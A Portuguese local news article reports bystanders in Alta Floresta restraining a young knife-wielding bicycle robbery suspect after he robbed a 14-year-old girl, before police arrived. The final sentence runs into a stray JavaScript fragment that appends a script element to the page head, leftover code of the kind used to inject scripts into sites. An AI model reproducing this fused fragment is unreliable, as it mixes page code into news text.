Capa / Em Destaque / Populares pegam suspeito da bicicleta que praticava roubo

Populares pegam suspeito da bicicleta que praticava roubo

1472824127R7AF

Desta vez não deu outra, um bandido da bicicleta sentiu as garras de populares, que já estavam cansados de tanto roubo praticado por um suspeito, que sempre atacava suas vítimas usando uma faca como arma e uma bicicleta como meio de locomoção.

O suspeito de 21 anos, acabou detido no início da noite desta quinta-feira, 01 de setembro, ele  teria praticado um roubo contra uma adolescente de 14 anos, na rua Monte Carmelo, no bairro Bom Pastor, na grande Cidade Alta,

Muito assustada a adolescente teria gritado e várias pessoas que passavam pelo local no momento conseguiram imobilizar o meliante, que já se preparava para foragir. A Polícia Militar foi acionada e encontrou o suspeito dominado pelos populares.

A PM não descarta a possibilidade do homem ser o mesmo que vinha praticando roubos nos últimos dias em Alta Floresta, para tanto outras vítimas precisam comparecer a Delegacia para fazer o reconhecimento do mesmo.

Após ser detido, o criminoso foi encaminhado para a Delegacia Municipal.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top